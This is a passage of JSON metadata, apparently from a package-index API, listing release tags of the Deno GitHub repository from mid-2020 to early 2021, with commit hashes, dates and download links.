mit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependen